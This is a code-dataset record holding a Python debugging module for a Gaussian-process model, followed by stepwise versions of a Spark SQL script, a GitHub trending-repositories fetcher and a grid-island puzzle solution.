    # Latent-function kernels F(j).
    for j in range(inference.num_latent):
        k_j = inference.kern_f[j]
        K_zz_f = k_j.kernel(inference.inducing_locations, inference.
            inducing_locations, jitter=True)
        mat = K_zz_f.eval(session=session)
        cond = np.linalg.cond(mat)
        sigma = k_j.sigma.eval(session=session)
        ls = k_j.length_scales.eval(session=session)
        print('MATRIX CONDITION F(' + str(j) + '): ', cond)
        print('SIGMA F(' + str(j) + '): ', sigma)
        print('LENGTH_SCALES F(' + str(j) + '): ', ls)
        print(mat)
    # Mixing-weight kernels W(i, j) — same diagnostics per output/latent pair.
    for j in range(inference.num_latent):
        for i in range(inference.num_outputs):
            k_ij = inference.kern_w[i][j]
            K_zz_w = k_ij.kernel(inference.inducing_locations, inference.
                inducing_locations, jitter=True)
            mat = K_zz_w.eval(session=session)
            cond = np.linalg.cond(mat)
            sigma = k_ij.sigma.eval(session=session)
            ls = k_ij.length_scales.eval(session=session)
            print('MATRIX CONDITION W(' + str(i) + ',' + str(j) + '): ', cond)
            print('SIGMA W(' + str(i) + ',' + str(j) + '): ', sigma)
            print('LENGTH_SCALES W(' + str(i) + ',' + str(j) + '): ', ls)
            print(mat)
<|reserved_special_token_1|>
import numpy as np
import tensorflow as tf
import math
from .. import util
def debug_inference(inference, dummy, entropy, cross_entropy, expected_log_likelhood):
    """Attach print side effects for the three ELBO terms to ``dummy``.

    Each tf.Print wraps ``dummy`` so the values are logged whenever the
    returned tensor is evaluated; ``inference`` is only used by the
    disabled variational-parameter toggles below.
    (Parameter name "likelhood" is a typo kept for caller compatibility.)
    """
    dummy = tf.Print(dummy, [entropy], 'entropy: ')
    dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')
    dummy = tf.Print(dummy, [expected_log_likelhood], 'expected_log_likelhood: ')
    # Extra debug toggles (left disabled):
    #dummy = tf.Print(dummy, [inference.q_means_u], 'self.q_means_u: ')
    #dummy = tf.Print(dummy, [inference.q_covars_u], 'self.q_covars_u: ')
    #dummy = tf.Print(dummy, [inference.q_means_v], 'self.q_means_v: ')
    #dummy = tf.Print(dummy, [inference.q_covars_v], 'self.q_covars_v: ')
    return dummy
def _report_kernel_condition(session, kern, inducing_locations, label):
    """Evaluate one kernel's K_zz Gram matrix (with jitter) and print its
    condition number, sigma, length scales, and the matrix itself."""
    K_zz = kern.kernel(inducing_locations, inducing_locations, jitter=True)
    mat = K_zz.eval(session=session)
    cond = np.linalg.cond(mat)
    sigma = kern.sigma.eval(session=session)
    ls = kern.length_scales.eval(session=session)
    print('MATRIX CONDITION ' + label + ': ', cond)
    print('SIGMA ' + label + ': ', sigma)
    print('LENGTH_SCALES ' + label + ': ', ls)
    print(mat)

def matrix_conditions(session, inference):
    """Print conditioning diagnostics for every latent (F) and mixing (W) kernel.

    Refactor: the two near-identical loop bodies are factored into
    ``_report_kernel_condition``; the output (labels, values, ordering)
    is unchanged.
    """
    # Latent-function kernels F(j).
    for j in range(inference.num_latent):
        _report_kernel_condition(session, inference.kern_f[j],
            inference.inducing_locations, 'F(' + str(j) + ')')
    # Mixing-weight kernels W(i, j), same iteration order as before.
    for j in range(inference.num_latent):
        for i in range(inference.num_outputs):
            _report_kernel_condition(session, inference.kern_w[i][j],
                inference.inducing_locations, 'W(' + str(i) + ',' + str(j) + ')')
|
flexible
|
{
"blob_id": "4758d6efde21e3b5d91f107188f24b6ddf7cbbe4",
"index": 7935,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef debug_inference(inference, dummy, entropy, cross_entropy,\n expected_log_likelhood):\n dummy = tf.Print(dummy, [entropy], 'entropy: ')\n dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')\n dummy = tf.Print(dummy, [expected_log_likelhood],\n 'expected_log_likelhood: ')\n return dummy\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef debug_inference(inference, dummy, entropy, cross_entropy,\n expected_log_likelhood):\n dummy = tf.Print(dummy, [entropy], 'entropy: ')\n dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')\n dummy = tf.Print(dummy, [expected_log_likelhood],\n 'expected_log_likelhood: ')\n return dummy\n\n\ndef matrix_conditions(session, inference):\n for j in range(inference.num_latent):\n k_j = inference.kern_f[j]\n K_zz_f = k_j.kernel(inference.inducing_locations, inference.\n inducing_locations, jitter=True)\n mat = K_zz_f.eval(session=session)\n cond = np.linalg.cond(mat)\n sigma = k_j.sigma.eval(session=session)\n ls = k_j.length_scales.eval(session=session)\n print('MATRIX CONDITION F(' + str(j) + '): ', cond)\n print('SIGMA F(' + str(j) + '): ', sigma)\n print('LENGTH_SCALES F(' + str(j) + '): ', ls)\n print(mat)\n for j in range(inference.num_latent):\n for i in range(inference.num_outputs):\n k_ij = inference.kern_w[i][j]\n K_zz_w = k_ij.kernel(inference.inducing_locations, inference.\n inducing_locations, jitter=True)\n mat = K_zz_w.eval(session=session)\n cond = np.linalg.cond(mat)\n sigma = k_ij.sigma.eval(session=session)\n ls = k_ij.length_scales.eval(session=session)\n print('MATRIX CONDITION W(' + str(i) + ',' + str(j) + '): ', cond)\n print('SIGMA W(' + str(i) + ',' + str(j) + '): ', sigma)\n print('LENGTH_SCALES W(' + str(i) + ',' + str(j) + '): ', ls)\n print(mat)\n",
"step-4": "import numpy as np\nimport tensorflow as tf\nimport math\nfrom .. import util\n\n\ndef debug_inference(inference, dummy, entropy, cross_entropy,\n expected_log_likelhood):\n dummy = tf.Print(dummy, [entropy], 'entropy: ')\n dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')\n dummy = tf.Print(dummy, [expected_log_likelhood],\n 'expected_log_likelhood: ')\n return dummy\n\n\ndef matrix_conditions(session, inference):\n for j in range(inference.num_latent):\n k_j = inference.kern_f[j]\n K_zz_f = k_j.kernel(inference.inducing_locations, inference.\n inducing_locations, jitter=True)\n mat = K_zz_f.eval(session=session)\n cond = np.linalg.cond(mat)\n sigma = k_j.sigma.eval(session=session)\n ls = k_j.length_scales.eval(session=session)\n print('MATRIX CONDITION F(' + str(j) + '): ', cond)\n print('SIGMA F(' + str(j) + '): ', sigma)\n print('LENGTH_SCALES F(' + str(j) + '): ', ls)\n print(mat)\n for j in range(inference.num_latent):\n for i in range(inference.num_outputs):\n k_ij = inference.kern_w[i][j]\n K_zz_w = k_ij.kernel(inference.inducing_locations, inference.\n inducing_locations, jitter=True)\n mat = K_zz_w.eval(session=session)\n cond = np.linalg.cond(mat)\n sigma = k_ij.sigma.eval(session=session)\n ls = k_ij.length_scales.eval(session=session)\n print('MATRIX CONDITION W(' + str(i) + ',' + str(j) + '): ', cond)\n print('SIGMA W(' + str(i) + ',' + str(j) + '): ', sigma)\n print('LENGTH_SCALES W(' + str(i) + ',' + str(j) + '): ', ls)\n print(mat)\n",
"step-5": "import numpy as np\nimport tensorflow as tf\nimport math\nfrom .. import util\n\ndef debug_inference(inference, dummy, entropy, cross_entropy, expected_log_likelhood):\n dummy = tf.Print(dummy, [entropy], 'entropy: ')\n dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')\n dummy = tf.Print(dummy, [expected_log_likelhood], 'expected_log_likelhood: ')\n #dummy = tf.Print(dummy, [inference.q_means_u], 'self.q_means_u: ')\n #dummy = tf.Print(dummy, [inference.q_covars_u], 'self.q_covars_u: ')\n #dummy = tf.Print(dummy, [inference.q_means_v], 'self.q_means_v: ')\n #dummy = tf.Print(dummy, [inference.q_covars_v], 'self.q_covars_v: ')\n\n return dummy\n\ndef matrix_conditions(session, inference):\n for j in range(inference.num_latent):\n k_j = inference.kern_f[j]\n K_zz_f = k_j.kernel(inference.inducing_locations, inference.inducing_locations, jitter=True)\n mat = K_zz_f.eval(session=session)\n cond = np.linalg.cond(mat)\n sigma = k_j.sigma.eval(session=session)\n ls = k_j.length_scales.eval(session=session)\n print('MATRIX CONDITION F('+str(j)+'): ', cond)\n print('SIGMA F('+str(j)+'): ', sigma)\n print('LENGTH_SCALES F('+str(j)+'): ', ls)\n\n print(mat)\n\n for j in range(inference.num_latent):\n for i in range(inference.num_outputs):\n k_ij = inference.kern_w[i][j]\n K_zz_w = k_ij.kernel(inference.inducing_locations, inference.inducing_locations, jitter=True)\n mat = K_zz_w.eval(session=session)\n cond = np.linalg.cond(mat)\n sigma = k_ij.sigma.eval(session=session)\n ls = k_ij.length_scales.eval(session=session)\n print('MATRIX CONDITION W('+str(i)+','+str(j)+'): ', cond)\n print('SIGMA W('+str(i)+','+str(j)+'): ', sigma)\n print('LENGTH_SCALES W('+str(i)+','+str(j)+'): ', ls)\n print(mat)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def mapper(line):
fields = line.split(',')
return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(
fields[2]), numFriends=int(fields[3]))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def mapper(line):
fields = line.split(',')
return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(
fields[2]), numFriends=int(fields[3]))
<|reserved_special_token_0|>
schemaPeople.registerTempTable('people')
<|reserved_special_token_0|>
print(teenagers.dtypes)
for teen in teenagers.collect():
print(teen)
schemaPeople.groupBy('age').count().orderBy(col('age').desc()).show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sc = SparkContext()
sqlCtx = SQLContext(sc)
def mapper(line):
fields = line.split(',')
return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(
fields[2]), numFriends=int(fields[3]))
lines = sc.textFile('fakefriends.csv')
people = lines.map(mapper)
schemaPeople = sqlCtx.createDataFrame(people).cache()
schemaPeople.registerTempTable('people')
teenagers = sqlCtx.sql('SELECT * FROM people WHERE age >= 13 AND age <= 19')
print(teenagers.dtypes)
for teen in teenagers.collect():
print(teen)
schemaPeople.groupBy('age').count().orderBy(col('age').desc()).show()
<|reserved_special_token_1|>
from pyspark.sql import SQLContext, Row
from pyspark import SparkContext, SparkConf
from pyspark.sql.functions import col
import collections
sc = SparkContext()
sqlCtx = SQLContext(sc)
def mapper(line):
fields = line.split(',')
return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(
fields[2]), numFriends=int(fields[3]))
lines = sc.textFile('fakefriends.csv')
people = lines.map(mapper)
schemaPeople = sqlCtx.createDataFrame(people).cache()
schemaPeople.registerTempTable('people')
teenagers = sqlCtx.sql('SELECT * FROM people WHERE age >= 13 AND age <= 19')
print(teenagers.dtypes)
for teen in teenagers.collect():
print(teen)
schemaPeople.groupBy('age').count().orderBy(col('age').desc()).show()
<|reserved_special_token_1|>
from pyspark.sql import SQLContext, Row
from pyspark import SparkContext, SparkConf
from pyspark.sql.functions import col
import collections
# Create a Spark Session (the config bit is only for windows)
#conf = SparkConf().setAppName("SQL App").setMaster("local")
sc = SparkContext()
sqlCtx = SQLContext(sc)
def mapper(line):
fields = line.split(",")
return Row(ID = int(fields[0]), name = fields[1].encode("utf-8"), age = int(fields[2]), numFriends = int(fields[3]))
lines = sc.textFile("fakefriends.csv")
people = lines.map(mapper)
# Infer the schema and register the DataFrame as a table
schemaPeople = sqlCtx.createDataFrame(people).cache()
schemaPeople.registerTempTable("people")
# SQL can be run over DataFrames that have been registered as a table
teenagers = sqlCtx.sql("SELECT * FROM people WHERE age >= 13 AND age <= 19")
print(teenagers.dtypes)
for teen in teenagers.collect():
print(teen)
schemaPeople.groupBy("age").count().orderBy(col("age").desc()).show()
|
flexible
|
{
"blob_id": "e4bc2e97b70e2dc91dc86457866ec6b3531ef803",
"index": 8772,
"step-1": "<mask token>\n\n\ndef mapper(line):\n fields = line.split(',')\n return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(\n fields[2]), numFriends=int(fields[3]))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef mapper(line):\n fields = line.split(',')\n return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(\n fields[2]), numFriends=int(fields[3]))\n\n\n<mask token>\nschemaPeople.registerTempTable('people')\n<mask token>\nprint(teenagers.dtypes)\nfor teen in teenagers.collect():\n print(teen)\nschemaPeople.groupBy('age').count().orderBy(col('age').desc()).show()\n",
"step-3": "<mask token>\nsc = SparkContext()\nsqlCtx = SQLContext(sc)\n\n\ndef mapper(line):\n fields = line.split(',')\n return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(\n fields[2]), numFriends=int(fields[3]))\n\n\nlines = sc.textFile('fakefriends.csv')\npeople = lines.map(mapper)\nschemaPeople = sqlCtx.createDataFrame(people).cache()\nschemaPeople.registerTempTable('people')\nteenagers = sqlCtx.sql('SELECT * FROM people WHERE age >= 13 AND age <= 19')\nprint(teenagers.dtypes)\nfor teen in teenagers.collect():\n print(teen)\nschemaPeople.groupBy('age').count().orderBy(col('age').desc()).show()\n",
"step-4": "from pyspark.sql import SQLContext, Row\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql.functions import col\nimport collections\nsc = SparkContext()\nsqlCtx = SQLContext(sc)\n\n\ndef mapper(line):\n fields = line.split(',')\n return Row(ID=int(fields[0]), name=fields[1].encode('utf-8'), age=int(\n fields[2]), numFriends=int(fields[3]))\n\n\nlines = sc.textFile('fakefriends.csv')\npeople = lines.map(mapper)\nschemaPeople = sqlCtx.createDataFrame(people).cache()\nschemaPeople.registerTempTable('people')\nteenagers = sqlCtx.sql('SELECT * FROM people WHERE age >= 13 AND age <= 19')\nprint(teenagers.dtypes)\nfor teen in teenagers.collect():\n print(teen)\nschemaPeople.groupBy('age').count().orderBy(col('age').desc()).show()\n",
"step-5": "from pyspark.sql import SQLContext, Row\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql.functions import col\n\nimport collections\n\n# Create a Spark Session (the config bit is only for windows)\n#conf = SparkConf().setAppName(\"SQL App\").setMaster(\"local\")\nsc = SparkContext()\n\nsqlCtx = SQLContext(sc)\n\ndef mapper(line):\n\tfields = line.split(\",\")\n\treturn Row(ID = int(fields[0]), name = fields[1].encode(\"utf-8\"), age = int(fields[2]), numFriends = int(fields[3]))\n\nlines = sc.textFile(\"fakefriends.csv\")\npeople = lines.map(mapper)\n\n# Infer the schema and register the DataFrame as a table\nschemaPeople = sqlCtx.createDataFrame(people).cache()\nschemaPeople.registerTempTable(\"people\")\n\n# SQL can be run over DataFrames that have been registered as a table\nteenagers = sqlCtx.sql(\"SELECT * FROM people WHERE age >= 13 AND age <= 19\")\nprint(teenagers.dtypes)\n\nfor teen in teenagers.collect():\n\tprint(teen)\n\nschemaPeople.groupBy(\"age\").count().orderBy(col(\"age\").desc()).show()\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import requests
from datetime import date
from datetime import timedelta
def get_offset_date(modifed_date, offset_in_days):
return date.isoformat(modifed_date + timedelta(days=int(offset_in_days)))
def get_trending_repositories(start_search_date, number_of_results=20):
github_api_uri = 'https://api.github.com'
query_search_url = '{}/search/repositories'.format(github_api_uri)
query_parameters = {'q': 'created:>{}'.format(start_search_date),
'sort': 'stars', 'order': 'desc', 'per_page': number_of_results}
trending_repositories_json_list = requests.get(query_search_url,
query_parameters).json()['items']
result_trending_list = []
for repository in trending_repositories_json_list:
repository_name = repository['name']
repoditory_owner = repository['owner']['login']
result_trending_list.append({'repo_name': str(repository_name),
'repo_owner': str(repoditory_owner), 'stars': repository[
'stargazers_count'], 'issues': repository['open_issues'], 'url':
repository['html_url']})
return result_trending_list
def get_open_issues_amount(repo_owner, repo_name):
github_api_uri = 'https://api.github.com'
query_search_url = '{0}/repos/{1}/{2}/issues'.format(github_api_uri,
repo_owner, repo_name)
issues_json_data = requests.get(query_search_url).json()
number_of_open_issues = len([x for x in issues_json_data if x['state'] ==
'open'])
return number_of_open_issues
def print_result_to_console():
print('Program prints {} most popular repositories since {}\n'.format(
number_of_results, week_earlier_date))
for index, repo in enumerate(top_repositories_list):
good_choice_label = ''
if not repo['issues']:
good_choice_label = 'Try it!'
print('{0:2} {4:7} {1:70} {2:5} stars {3:2} issues'.format(index +
1, repo['url'], repo['stars'], repo['issues'], good_choice_label))
if __name__ == '__main__':
date_offset_in_days = -7
week_earlier_date = get_offset_date(date.today(), date_offset_in_days)
number_of_results = 20
top_repositories_list = get_trending_repositories(week_earlier_date,
number_of_results)
print_result_to_console()
|
normal
|
{
"blob_id": "8a7536b998a6d122e2e7529af1ebe2a0f025303f",
"index": 5620,
"step-1": "<mask token>\n\n\ndef get_offset_date(modifed_date, offset_in_days):\n return date.isoformat(modifed_date + timedelta(days=int(offset_in_days)))\n\n\ndef get_trending_repositories(start_search_date, number_of_results=20):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{}/search/repositories'.format(github_api_uri)\n query_parameters = {'q': 'created:>{}'.format(start_search_date),\n 'sort': 'stars', 'order': 'desc', 'per_page': number_of_results}\n trending_repositories_json_list = requests.get(query_search_url,\n query_parameters).json()['items']\n result_trending_list = []\n for repository in trending_repositories_json_list:\n repository_name = repository['name']\n repoditory_owner = repository['owner']['login']\n result_trending_list.append({'repo_name': str(repository_name),\n 'repo_owner': str(repoditory_owner), 'stars': repository[\n 'stargazers_count'], 'issues': repository['open_issues'], 'url':\n repository['html_url']})\n return result_trending_list\n\n\n<mask token>\n\n\ndef print_result_to_console():\n print('Program prints {} most popular repositories since {}\\n'.format(\n number_of_results, week_earlier_date))\n for index, repo in enumerate(top_repositories_list):\n good_choice_label = ''\n if not repo['issues']:\n good_choice_label = 'Try it!'\n print('{0:2} {4:7} {1:70} {2:5} stars {3:2} issues'.format(index + \n 1, repo['url'], repo['stars'], repo['issues'], good_choice_label))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_offset_date(modifed_date, offset_in_days):\n return date.isoformat(modifed_date + timedelta(days=int(offset_in_days)))\n\n\ndef get_trending_repositories(start_search_date, number_of_results=20):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{}/search/repositories'.format(github_api_uri)\n query_parameters = {'q': 'created:>{}'.format(start_search_date),\n 'sort': 'stars', 'order': 'desc', 'per_page': number_of_results}\n trending_repositories_json_list = requests.get(query_search_url,\n query_parameters).json()['items']\n result_trending_list = []\n for repository in trending_repositories_json_list:\n repository_name = repository['name']\n repoditory_owner = repository['owner']['login']\n result_trending_list.append({'repo_name': str(repository_name),\n 'repo_owner': str(repoditory_owner), 'stars': repository[\n 'stargazers_count'], 'issues': repository['open_issues'], 'url':\n repository['html_url']})\n return result_trending_list\n\n\ndef get_open_issues_amount(repo_owner, repo_name):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{0}/repos/{1}/{2}/issues'.format(github_api_uri,\n repo_owner, repo_name)\n issues_json_data = requests.get(query_search_url).json()\n number_of_open_issues = len([x for x in issues_json_data if x['state'] ==\n 'open'])\n return number_of_open_issues\n\n\ndef print_result_to_console():\n print('Program prints {} most popular repositories since {}\\n'.format(\n number_of_results, week_earlier_date))\n for index, repo in enumerate(top_repositories_list):\n good_choice_label = ''\n if not repo['issues']:\n good_choice_label = 'Try it!'\n print('{0:2} {4:7} {1:70} {2:5} stars {3:2} issues'.format(index + \n 1, repo['url'], repo['stars'], repo['issues'], good_choice_label))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_offset_date(modifed_date, offset_in_days):\n return date.isoformat(modifed_date + timedelta(days=int(offset_in_days)))\n\n\ndef get_trending_repositories(start_search_date, number_of_results=20):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{}/search/repositories'.format(github_api_uri)\n query_parameters = {'q': 'created:>{}'.format(start_search_date),\n 'sort': 'stars', 'order': 'desc', 'per_page': number_of_results}\n trending_repositories_json_list = requests.get(query_search_url,\n query_parameters).json()['items']\n result_trending_list = []\n for repository in trending_repositories_json_list:\n repository_name = repository['name']\n repoditory_owner = repository['owner']['login']\n result_trending_list.append({'repo_name': str(repository_name),\n 'repo_owner': str(repoditory_owner), 'stars': repository[\n 'stargazers_count'], 'issues': repository['open_issues'], 'url':\n repository['html_url']})\n return result_trending_list\n\n\ndef get_open_issues_amount(repo_owner, repo_name):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{0}/repos/{1}/{2}/issues'.format(github_api_uri,\n repo_owner, repo_name)\n issues_json_data = requests.get(query_search_url).json()\n number_of_open_issues = len([x for x in issues_json_data if x['state'] ==\n 'open'])\n return number_of_open_issues\n\n\ndef print_result_to_console():\n print('Program prints {} most popular repositories since {}\\n'.format(\n number_of_results, week_earlier_date))\n for index, repo in enumerate(top_repositories_list):\n good_choice_label = ''\n if not repo['issues']:\n good_choice_label = 'Try it!'\n print('{0:2} {4:7} {1:70} {2:5} stars {3:2} issues'.format(index + \n 1, repo['url'], repo['stars'], repo['issues'], good_choice_label))\n\n\nif __name__ == '__main__':\n date_offset_in_days = -7\n week_earlier_date = get_offset_date(date.today(), date_offset_in_days)\n number_of_results = 20\n top_repositories_list = 
get_trending_repositories(week_earlier_date,\n number_of_results)\n print_result_to_console()\n",
"step-4": "import requests\nfrom datetime import date\nfrom datetime import timedelta\n\n\ndef get_offset_date(modifed_date, offset_in_days):\n return date.isoformat(modifed_date + timedelta(days=int(offset_in_days)))\n\n\ndef get_trending_repositories(start_search_date, number_of_results=20):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{}/search/repositories'.format(github_api_uri)\n query_parameters = {'q': 'created:>{}'.format(start_search_date),\n 'sort': 'stars', 'order': 'desc', 'per_page': number_of_results}\n trending_repositories_json_list = requests.get(query_search_url,\n query_parameters).json()['items']\n result_trending_list = []\n for repository in trending_repositories_json_list:\n repository_name = repository['name']\n repoditory_owner = repository['owner']['login']\n result_trending_list.append({'repo_name': str(repository_name),\n 'repo_owner': str(repoditory_owner), 'stars': repository[\n 'stargazers_count'], 'issues': repository['open_issues'], 'url':\n repository['html_url']})\n return result_trending_list\n\n\ndef get_open_issues_amount(repo_owner, repo_name):\n github_api_uri = 'https://api.github.com'\n query_search_url = '{0}/repos/{1}/{2}/issues'.format(github_api_uri,\n repo_owner, repo_name)\n issues_json_data = requests.get(query_search_url).json()\n number_of_open_issues = len([x for x in issues_json_data if x['state'] ==\n 'open'])\n return number_of_open_issues\n\n\ndef print_result_to_console():\n print('Program prints {} most popular repositories since {}\\n'.format(\n number_of_results, week_earlier_date))\n for index, repo in enumerate(top_repositories_list):\n good_choice_label = ''\n if not repo['issues']:\n good_choice_label = 'Try it!'\n print('{0:2} {4:7} {1:70} {2:5} stars {3:2} issues'.format(index + \n 1, repo['url'], repo['stars'], repo['issues'], good_choice_label))\n\n\nif __name__ == '__main__':\n date_offset_in_days = -7\n week_earlier_date = get_offset_date(date.today(), date_offset_in_days)\n 
number_of_results = 20\n top_repositories_list = get_trending_repositories(week_earlier_date,\n number_of_results)\n print_result_to_console()\n",
"step-5": null,
"step-ids": [
3,
4,
5,
6
]
}
|
[
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def checkLand(self, grid, x, y):
print(f'current checkLand(x,y) are {x}, {y}')
if x < 0 or x >= len(grid):
return False
if y < 0 or y >= len(grid[0]):
return False
return grid[x][y] == 1
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
def checkValid(self, grid, visited, x, y):
if x < 0 or x >= len(grid):
return False
if y < 0 or y >= len(grid[0]):
return False
if (x, y) in visited:
return False
return grid[x][y] == 1
def checkLand(self, grid, x, y):
print(f'current checkLand(x,y) are {x}, {y}')
if x < 0 or x >= len(grid):
return False
if y < 0 or y >= len(grid[0]):
return False
return grid[x][y] == 1
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def minDays(self, grid: List[List[int]]) ->int:
i, j = 0, 0
islandExists = False
visited = dict()
leastAdjacent = 4
while i < len(grid):
while j < len(grid[i]):
if grid[i][j] == 1 and (i, j) not in visited:
if islandExists == True:
return 0
islandExists = True
s = list()
s.append((i, j))
while s:
n = 0
x, y = s.pop()
print(f'current coords are {x}, {y}')
visited[x, y] = True
if self.checkLand(grid, x - 1, y):
n += 1
if self.checkLand(grid, x + 1, y):
n += 1
if self.checkLand(grid, x, y - 1):
n += 1
if self.checkLand(grid, x, y + 1):
n += 1
leastAdjacent = min(leastAdjacent, n)
if self.checkValid(grid, visited, x - 1, y):
s.append((x - 1, y))
if self.checkValid(grid, visited, x + 1, y):
s.append((x + 1, y))
if self.checkValid(grid, visited, x, y - 1):
s.append((x, y - 1))
if self.checkValid(grid, visited, x, y + 1):
s.append((x, y + 1))
j += 1
i += 1
if len(grid[0]) == 2:
return 2
return leastAdjacent
def checkValid(self, grid, visited, x, y):
if x < 0 or x >= len(grid):
return False
if y < 0 or y >= len(grid[0]):
return False
if (x, y) in visited:
return False
return grid[x][y] == 1
def checkLand(self, grid, x, y):
print(f'current checkLand(x,y) are {x}, {y}')
if x < 0 or x >= len(grid):
return False
if y < 0 or y >= len(grid[0]):
return False
return grid[x][y] == 1
<|reserved_special_token_1|>
#!/usr/bin/python3
"""
@author : Chris Phibbs
@created : Sunday Aug 30, 2020 14:05:56 AEST
@file : q3
"""
class Solution:
def minDays(self, grid: List[List[int]]) -> int:
# bfs - find 1, run bfs. Then loop through - if any other ones found then disconnected
i, j = 0, 0
islandExists = False
visited = dict()
leastAdjacent = 4
while i < len(grid):
while j < len(grid[i]):
if grid[i][j] == 1 and (i,j) not in visited:
# new land - return 0 if already disconnected from already found land
if islandExists == True: return 0
islandExists = True
# run bfs
s = list()
s.append((i,j))
while s:
n = 0
x, y = s.pop()
print(f"current coords are {x}, {y}")
visited[(x,y)] = True
if self.checkLand(grid, x-1, y): n+=1
if self.checkLand(grid, x+1, y): n+=1
if self.checkLand(grid, x, y-1): n+=1
if self.checkLand(grid, x, y+1): n+=1
leastAdjacent = min(leastAdjacent, n)
if self.checkValid(grid, visited, x-1, y): s.append((x-1, y))
if self.checkValid(grid, visited, x+1, y): s.append((x+1, y))
if self.checkValid(grid, visited, x, y-1): s.append((x, y-1))
if self.checkValid(grid, visited, x, y+1): s.append((x, y+1))
# Did not handle the "bridge" case - i.e. element of n == 2 that when removed disconnects everything
# TL;DR If not in the corner and n==2 then answer is 1
j += 1
i += 1
if len(grid[0]) == 2: return 2
return leastAdjacent
# if land and not visited, run bfs
# else do nothing
# returns True if valid land
def checkValid(self, grid, visited, x, y):
if x < 0 or x >= len(grid): return False
if y < 0 or y >= len(grid[0]): return False
if (x,y) in visited: return False
return grid[x][y] == 1
def checkLand(self, grid, x, y):
print(f"current checkLand(x,y) are {x}, {y}")
if x < 0 or x >= len(grid): return False
if y < 0 or y >= len(grid[0]): return False
return grid[x][y] == 1
|
flexible
|
{
"blob_id": "cddd5deba0ddc59a604d2926bdc687716e08f226",
"index": 1557,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n <mask token>\n\n def checkLand(self, grid, x, y):\n print(f'current checkLand(x,y) are {x}, {y}')\n if x < 0 or x >= len(grid):\n return False\n if y < 0 or y >= len(grid[0]):\n return False\n return grid[x][y] == 1\n",
"step-3": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n def checkValid(self, grid, visited, x, y):\n if x < 0 or x >= len(grid):\n return False\n if y < 0 or y >= len(grid[0]):\n return False\n if (x, y) in visited:\n return False\n return grid[x][y] == 1\n\n def checkLand(self, grid, x, y):\n print(f'current checkLand(x,y) are {x}, {y}')\n if x < 0 or x >= len(grid):\n return False\n if y < 0 or y >= len(grid[0]):\n return False\n return grid[x][y] == 1\n",
"step-4": "<mask token>\n\n\nclass Solution:\n\n def minDays(self, grid: List[List[int]]) ->int:\n i, j = 0, 0\n islandExists = False\n visited = dict()\n leastAdjacent = 4\n while i < len(grid):\n while j < len(grid[i]):\n if grid[i][j] == 1 and (i, j) not in visited:\n if islandExists == True:\n return 0\n islandExists = True\n s = list()\n s.append((i, j))\n while s:\n n = 0\n x, y = s.pop()\n print(f'current coords are {x}, {y}')\n visited[x, y] = True\n if self.checkLand(grid, x - 1, y):\n n += 1\n if self.checkLand(grid, x + 1, y):\n n += 1\n if self.checkLand(grid, x, y - 1):\n n += 1\n if self.checkLand(grid, x, y + 1):\n n += 1\n leastAdjacent = min(leastAdjacent, n)\n if self.checkValid(grid, visited, x - 1, y):\n s.append((x - 1, y))\n if self.checkValid(grid, visited, x + 1, y):\n s.append((x + 1, y))\n if self.checkValid(grid, visited, x, y - 1):\n s.append((x, y - 1))\n if self.checkValid(grid, visited, x, y + 1):\n s.append((x, y + 1))\n j += 1\n i += 1\n if len(grid[0]) == 2:\n return 2\n return leastAdjacent\n\n def checkValid(self, grid, visited, x, y):\n if x < 0 or x >= len(grid):\n return False\n if y < 0 or y >= len(grid[0]):\n return False\n if (x, y) in visited:\n return False\n return grid[x][y] == 1\n\n def checkLand(self, grid, x, y):\n print(f'current checkLand(x,y) are {x}, {y}')\n if x < 0 or x >= len(grid):\n return False\n if y < 0 or y >= len(grid[0]):\n return False\n return grid[x][y] == 1\n",
